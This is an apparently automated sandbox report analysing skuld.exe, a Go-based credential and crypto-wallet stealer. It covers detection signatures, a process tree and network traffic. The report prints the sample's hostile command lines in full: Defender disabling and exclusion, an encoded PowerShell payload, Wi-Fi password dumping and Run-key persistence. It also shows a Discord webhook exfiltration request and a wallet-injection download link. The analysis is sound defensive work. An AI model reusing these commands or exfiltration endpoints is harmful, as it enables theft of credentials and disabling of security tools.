
Windows Analysis Report
skuld.exe

Overview

General Information

Sample name: skuld.exe
Analysis ID: 1636046
MD5: 1b19480e05b72abb96aafdf9625b5646
SHA1: 38a12185fcedf55ecb219e684206a733fff2cd7b
SHA256: 40a684ff28f001ad2b3aaa501d2eade9aaf94fe6951eea52239f39835e6c7e37

Detection

Go Stealer, Skuld Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Go Stealer
Yara detected Skuld Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • skuld.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\skuld.exe" MD5: 1B19480E05B72ABB96AAFDF9625B5646)
    • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 364 cmdline: attrib +h +s C:\Users\user\Desktop\skuld.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 736 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • WMIC.exe (PID: 1172 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 768 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • powershell.exe (PID: 3724 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • WMIC.exe (PID: 3216 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 2372 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 2896 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 3928 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • netsh.exe (PID: 5464 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • powershell.exe (PID: 5196 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 1800 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5840 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 2108 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
    • attrib.exe (PID: 5152 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 6464 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
skuld.exe | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security |
skuld.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
skuld.exe | JoeSecurity_SkuldStealer | Yara detected Skuld Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security |
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | JoeSecurity_SkuldStealer | Yara detected Skuld Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_SkuldStealer | Yara detected Skuld Stealer | Joe Security |
Process Memory Space: skuld.exe PID: 7148 | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security |
Process Memory Space: skuld.exe PID: 7148 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: skuld.exe PID: 7148 | JoeSecurity_SkuldStealer | Yara detected Skuld Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\skuld.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, ProcessId: 3724, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 2108, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started | Author: frack113 | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\skuld.exe, ProcessId: 7148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABi
AGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, ProcessId: 3724, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5196, TargetFilename: C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, ProcessId: 3724, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 5464, ProcessName: netsh.exe
No Suricata rule has matched


AV Detection

Source: skuld.exe | Virustotal: Detection: 24%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: skuld.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \de.pdb- | source: powershell.exe, 0000000D.00000002.1750605132.000001CAF7485000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdb | source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdbhPtC | source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: api.ipify.org
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected:
    GET /getServer HTTP/1.1
    Host: api.gofile.io
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected:
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected:
    GET /json HTTP/1.1
    Host: ip-api.com
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.gofile.io
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected:
    POST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
    Host: discord.com
    User-Agent: Go-http-client/1.1
    Content-Length: 702
    Content-Type: multipart/form-data; boundary=588f6ce998f0ce22e2ac536e8401330f8bfc454e3af5047d21eeaeb6fd57
    Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.27.1
    Date: Wed, 12 Mar 2025 09:40:51 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 14
    Connection: close
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
    Access-Control-Allow-Credentials: true
    Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Resource-Policy: cross-origin
    Origin-Agent-Cluster: ?1
    Referrer-Policy: no-referrer
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Content-Type-Options: nosniff
    X-DNS-Prefetch-Control: off
    X-Download-Options: noopen
    X-Frame-Options: SAMEORIGIN
    X-Permitted-Cross-Domain-Policies: none
    X-XSS-Protection: 0
    ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
    X-Robots-Tag: noindex, nofollow
Source: powershell.exe, 0000000F.00000002.1766382072.000002704FF15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: http://ip-api.com/json
Source: powershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngP
Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://bugzilla.mo
Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67d2
Source: powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://discord.com/api/v8/guilds/too
Source: SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://discord.com/api/v9/users/
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0Sh
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://discord.gg/release
Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterP
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://go.dev/issue/66821):
Source: skuld.exe, SecurityHealthSystray.exe.0.dr | String found in binary or memory: https://go.dev/pkg/crypto/rsa#hdr-Minimum_key_size)b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120
Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE037D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: skuld.exe, 00000000.00000002.2728804738.000000C000054000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg
